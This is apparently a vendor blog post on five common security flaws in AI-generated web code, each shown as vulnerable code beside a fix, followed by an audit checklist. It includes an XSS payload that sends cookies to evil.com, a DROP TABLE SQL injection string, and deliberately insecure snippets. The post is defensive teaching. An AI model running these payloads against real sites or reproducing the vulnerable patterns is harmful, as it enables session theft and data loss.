security

Why 45% of AI-Generated Code Fails Security Tests (And How to Fix It)

AI coding tools produce code with 1.88x more password vulnerabilities and 2.74x more XSS flaws. Here are the five most common security failures and how to catch them before your users do.

FinishKit Team13 min read

You shipped your AI-built SaaS on a Friday. By Saturday afternoon, it was on the front page of Product Hunt. Users were signing up. Stripe was pinging. You were riding the high.

Then the DM landed: "Hey, I can see everyone's data. You might want to fix this."

Your stomach drops. You check the network tab. The API endpoint returns all user records with no auth check, no row-level filtering, nothing. The AI generated a clean, functional endpoint that serves every row in the table to anyone who asks. You've been live for 18 hours.

This isn't a hypothetical. Variations of this exact scenario play out every week. And the research explains why.

The Veracode Report: AI Code's Security Problem

Veracode's 2025 GenAI Code Security Report analyzed thousands of AI-generated code samples across multiple languages. The headline number: 45% of AI-generated code contains security vulnerabilities. Not style issues. Not minor warnings. Actual exploitable security flaws.

The breakdown gets worse when you look at specific vulnerability types.

86% of AI-generated code samples failed to defend against cross-site scripting. AI code also contained 1.88x more improper password handling and 2.74x more XSS vulnerabilities compared to human-written code. (Veracode 2025 GenAI Code Security Report)

Language matters, too. Java code generated by AI had a 72% security failure rate. Python, JavaScript, and C# ranged between 38-45%, which is better but still alarming when you consider that nearly half the code your AI assistant writes might be exploitable.

The Cloud Security Alliance corroborates this at the design level: 62% of AI-generated code contains design flaws or known security vulnerabilities (CSA 2025 AI Code Security Study). These aren't just implementation bugs. They're architectural decisions (storing secrets in plaintext, trusting client-side state, skipping authorization entirely) baked into the foundation of the app.

The Five Most Common AI Code Security Failures

Every security audit of AI-generated code surfaces the same patterns. Here are the five that show up most often, with concrete examples of what the vulnerable code looks like and how to fix it.

1. Hardcoded Secrets

This is the most common and most preventable vulnerability in AI-generated code. AI tools pull patterns from training data, and their training data is full of tutorials that drop API keys directly into source files. Apiiro's research across Fortune 50 enterprises found a 40% increase in secrets exposure in AI-generated code (Apiiro 2025).

The AI generates this:

// AI-generated: API key right in the source
const stripe = new Stripe("sk_live_51ABC123DEF456GHI789JKL0");
 
const supabaseClient = createClient(
  "https://abc123.supabase.co",
  "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.secret_key_here"
);

Fix it:

// Fixed: keys come from environment variables
const stripe = new Stripe(process.env.STRIPE_SECRET_KEY!);
 
const supabaseClient = createClient(
  process.env.NEXT_PUBLIC_SUPABASE_URL!,
  process.env.NEXT_PUBLIC_SUPABASE_PUBLISHABLE_KEY!
);

And make sure your .gitignore actually includes .env:

# Check if .env is in .gitignore
grep -n "\.env" .gitignore
 
# If it's missing, add it
echo ".env*" >> .gitignore
 
# Scan your repo for leaked secrets
grep -rn "sk_live\|sk_test\|AKIA\|password\s*=\s*['\"]" \
  --include="*.ts" --include="*.tsx" --include="*.js" \
  src/ app/ lib/

If that grep returns results, you have a problem. If any of those files were ever committed, the secrets are in your git history even after you remove them. Rotate every exposed key immediately.

2. Client-Side Authorization

This is the vulnerability that sinks AI-built SaaS apps. AI tools build authorization logic into React components, checking subscription status, user roles, or feature flags on the client. The code looks correct. The UI hides the right things. But none of it is enforced.

The AI generates this:

// AI-generated: auth check only in the React component
export default function AdminDashboard() {
  const { user } = useAuth();
 
  if (user?.role !== "admin") {
    return <p>Access denied</p>;
  }
 
  // Admin-only data fetched client-side
  const { data } = useSWR("/api/admin/users", fetcher);
 
  return <UserTable data={data} />;
}

The problem: /api/admin/users has no auth check. Anyone can curl it.

Fix it by enforcing authorization on the server:

// Fixed: server-side auth on the API route
export async function GET(request: Request) {
  const supabase = await createClient();
  const { data: { user }, error } = await supabase.auth.getUser();
 
  if (error || !user) {
    return Response.json({ error: "Unauthorized" }, { status: 401 });
  }
 
  // Check role in the database, not from client state
  const { data: profile } = await supabase
    .from("profiles")
    .select("role")
    .eq("id", user.id)
    .single();
 
  if (profile?.role !== "admin") {
    return Response.json({ error: "Forbidden" }, { status: 403 });
  }
 
  const { data } = await supabase.from("users").select("*");
  return Response.json(data);
}

The rule is simple: if you can't enforce it on the server, it's not enforced at all. Client-side checks are UX conveniences. Server-side checks are security.

3. SQL Injection

AI-generated database queries frequently use string interpolation instead of parameterized queries. The AI writes code that works with normal input. An attacker's input is not normal.

The AI generates this:

// AI-generated: string concatenation in the query
export async function GET(request: Request) {
  const { searchParams } = new URL(request.url);
  const search = searchParams.get("search") || "";
 
  const { data } = await supabase
    .rpc("search_users", {
      query: `%${search}%`
    });
 
  // Or worse, raw SQL:
  const result = await pool.query(
    `SELECT * FROM users WHERE name LIKE '%${search}%'`
  );
 
  return Response.json(data);
}

That raw SQL version? An attacker sends '; DROP TABLE users; -- and your data is gone.

Fix it:

// Fixed: parameterized queries only
export async function GET(request: Request) {
  const { searchParams } = new URL(request.url);
  const search = searchParams.get("search") || "";
 
  // Validate and sanitize input
  const sanitized = search.replace(/[%_]/g, "\\$&").slice(0, 100);
 
  // Parameterized query: the database driver handles escaping
  const result = await pool.query(
    "SELECT id, name, email FROM users WHERE name ILIKE $1 LIMIT 20",
    [`%${sanitized}%`]
  );
 
  return Response.json(result.rows);
}

If you're using Supabase, the client library handles parameterization for you through its query builder. But the moment you drop into raw SQL with .rpc() or a direct Postgres connection, you're responsible for preventing injection yourself.

4. Cross-Site Scripting (XSS)

This is the big one statistically. 86% of AI-generated code fails to defend against XSS (Veracode 2025). AI tools render user-provided content directly into the DOM without sanitization. In React, this usually means using dangerouslySetInnerHTML without cleaning the input first.

The AI generates this:

// AI-generated: raw HTML injection
export function UserComment({ comment }: { comment: string }) {
  return (
    <div
      className="comment"
      dangerouslySetInnerHTML={{ __html: comment }}
    />
  );
}
 
// Or in a profile page:
export function UserBio({ bio }: { bio: string }) {
  return <div dangerouslySetInnerHTML={{ __html: bio }} />;
}

An attacker sets their bio to <img src=x onerror="fetch('https://evil.com/steal?cookie='+document.cookie)"> and every user who views their profile gets their session stolen.

Fix it:

import DOMPurify from "dompurify";
 
// Fixed: sanitize before rendering
export function UserComment({ comment }: { comment: string }) {
  const clean = DOMPurify.sanitize(comment, {
    ALLOWED_TAGS: ["b", "i", "em", "strong", "a", "p", "br"],
    ALLOWED_ATTR: ["href"],
  });
 
  return (
    <div
      className="comment"
      dangerouslySetInnerHTML={{ __html: clean }}
    />
  );
}
 
// Even better: avoid dangerouslySetInnerHTML entirely
export function UserBio({ bio }: { bio: string }) {
  // Plain text rendering, no HTML interpretation at all
  return <p className="bio">{bio}</p>;
}

The best defense against XSS is to never use dangerouslySetInnerHTML. React escapes content by default. The moment you opt out of that protection, you own the consequences.

5. Improper Password Handling

AI-generated auth code frequently stores passwords in plaintext or uses weak, outdated hashing. Veracode found 1.88x more improper password handling in AI code compared to human-written code. This one is particularly dangerous because it's invisible until there's a breach.

The AI generates this:

// AI-generated: plaintext password storage
export async function POST(request: Request) {
  const { email, password } = await request.json();
 
  await db.query(
    "INSERT INTO users (email, password) VALUES ($1, $2)",
    [email, password] // Stored in plaintext
  );
 
  return Response.json({ success: true });
}
 
// Or slightly better but still bad:
import { createHash } from "crypto";
 
const hashed = createHash("md5").update(password).digest("hex");

MD5 is not password hashing. It's a checksum algorithm from the 1990s. A modern GPU cracks MD5 hashes at billions per second.

Fix it:

import bcrypt from "bcrypt";
 
const SALT_ROUNDS = 12;
 
// Registration: hash before storing
export async function POST(request: Request) {
  const { email, password } = await request.json();
 
  // Validate password strength
  if (password.length < 8) {
    return Response.json(
      { error: "Password must be at least 8 characters" },
      { status: 400 }
    );
  }
 
  const hashedPassword = await bcrypt.hash(password, SALT_ROUNDS);
 
  await db.query(
    "INSERT INTO users (email, password_hash) VALUES ($1, $2)",
    [email, hashedPassword]
  );
 
  return Response.json({ success: true });
}
 
// Login: compare against hash
export async function verifyPassword(
  password: string,
  hash: string
): Promise<boolean> {
  return bcrypt.compare(password, hash);
}

Better yet: don't build password handling at all. Use a managed auth provider like Supabase Auth, Clerk, or Auth.js. They handle hashing, salting, rate limiting on login attempts, and breached password detection. This is one area where delegation is strictly better than doing it yourself.

Why AI Keeps Making These Mistakes

Understanding why AI produces insecure code helps you predict where the vulnerabilities will be.

Training data bias. AI models learned from millions of code samples scraped from the internet. A huge portion of that training data is tutorials, Stack Overflow answers, and example projects. Tutorials optimize for teaching concepts, not security. They hardcode API keys so the reader can follow along. They skip auth checks to keep the example focused. The AI learned these patterns and reproduces them faithfully.

No adversarial thinking. AI optimizes for "does this code work?" It does not think about "how could someone exploit this?" Security requires a fundamentally different mindset, one that considers what happens when inputs are malicious, when users lie about who they are, when requests come in faster than expected. AI has no concept of an attacker.

Context window limits. Security vulnerabilities often span multiple files. An API route might be missing auth because the middleware was supposed to handle it, but the middleware has a gap. A secret might be in .env locally but hardcoded in a config file the AI generated for deployment. These cross-file, cross-system vulnerabilities require understanding the full attack surface. AI sees one file at a time.

Pattern replication. AI copies what worked before. If the most common pattern in its training data for a database query uses string concatenation, that's what it generates. It doesn't evaluate whether the pattern is safe. It evaluates whether the pattern is common.

A Practical Security Audit for Your AI-Built App

Here's a step-by-step audit you can run in an afternoon. It won't catch everything, but it will catch the five vulnerability categories above, which account for the vast majority of AI code security issues.

Step 1: Scan for exposed secrets. Run these commands from your project root. If anything comes back, move it to environment variables and rotate the exposed key.

# Search for hardcoded API keys and secrets
grep -rn "sk_live\|sk_test\|AKIA\|secret_key\|password\s*=" \
  --include="*.ts" --include="*.tsx" --include="*.js" --include="*.env*" .
 
# Check if .env is in .gitignore
grep "\.env" .gitignore || echo "WARNING: .env not in .gitignore!"
 
# Check git history for previously committed secrets
git log --all -p --diff-filter=D -- "*.env" 2>/dev/null | head -50

Step 2: Verify auth on every API route. List all your API routes and check each one for server-side authentication.

# List all API route files
find app/api -name "route.ts" -o -name "route.js" | sort
 
# Check which routes have auth checks
grep -rL "getUser\|getSession\|getServerSession\|auth()\|getToken" app/api/

That second command lists routes without auth checks. Every route in that list is either intentionally public or a vulnerability.

Step 3: Run dependency vulnerability scans.

# Check for known vulnerabilities in dependencies
npm audit
 
# Check for outdated packages with known issues
npx npm-check-updates --doctor

Step 4: Test input validation on your endpoints. Try sending garbage to every endpoint that accepts user input.

# Test for SQL injection
curl -X GET "http://localhost:3000/api/search?q='; DROP TABLE users; --"
 
# Test for XSS in any endpoint that returns user content
curl -X POST http://localhost:3000/api/comments \
  -H "Content-Type: application/json" \
  -d '{"body": "<script>alert(1)</script>"}'
 
# Test for oversized payloads
curl -X POST http://localhost:3000/api/data \
  -H "Content-Type: application/json" \
  -d "{\"data\": \"$(python3 -c 'print("A" * 1000000)')\"}"

Step 5: Audit client-side security logic. Search for authorization checks that only exist in the frontend.

# Find client-side role/permission checks that might not be enforced server-side
grep -rn "role.*===\|isAdmin\|isPremium\|subscription" \
  --include="*.tsx" --include="*.jsx" components/ app/

Every hit in that search needs a corresponding server-side enforcement. If the component checks isPremium before showing content, the API route serving that content must also verify the subscription.

The 1-in-5 Stat That Should Worry Everyone

The vulnerabilities above aren't theoretical risks. They're causing real breaches right now.

1 in 5 data breaches are now caused by AI-generated code (Aikido Security 2026 State of AI Code Security Report). That number was effectively zero two years ago.

The data points are converging from every direction:

  • 69% of organizations have discovered vulnerabilities in their codebases that were directly introduced by AI coding tools (Aikido Security 2026).
  • 170 out of 1,645 Lovable-created web applications had security vulnerabilities that exposed personal data to anyone with a browser (Supabase community audit, 2025).
  • AI-generated code contains 15-18% more security vulnerabilities than human-written code across comparable projects (Opsera 2026 Software Development Analytics Report).

This isn't a future risk to prepare for. It's a current crisis. If you shipped an AI-built app in the last 12 months without a security review, the odds that it has at least one exploitable vulnerability are closer to "likely" than "possible."

The uncomfortable pattern: AI tools make it easy to build and launch fast. Speed is the selling point. But speed without security review is how you end up as the next "I can see everyone's data" horror story.

The organizations getting hit aren't just solo developers shipping side projects. They're companies with engineering teams that adopted AI coding tools without adjusting their review processes. The AI generates code that passes functional tests. It does what the spec asks. It just also does things the spec didn't account for, like serving unauthenticated requests or storing passwords in plaintext.

Close the Gap

The good news: most AI code security issues are fixable in a weekend. The five vulnerability categories in this post cover the vast majority of what goes wrong. The audit checklist above is a concrete starting point.

The better news: you don't have to do this manually every time. Tools like FinishKit scan your entire codebase, flag these exact patterns, and generate fixes as pull requests. But whether you automate it or do it by hand, the important thing is that you do it.

Security isn't a feature you add after launch. It's a prerequisite for deserving your users' trust. The bar isn't perfection. It's diligence. Scan for secrets. Enforce auth on the server. Parameterize your queries. Sanitize your inputs. Hash your passwords.

If you're looking for the broader production readiness picture beyond security, the shipping checklist covers error handling, testing, deployment, and UX polish. For a deep dive on protecting user data in Supabase specifically, the RLS guide walks through row-level security from scratch.

Your AI tool wrote the code. You're responsible for what it does. A weekend of security hardening is the difference between a product that earns trust and one that loses it. Start today.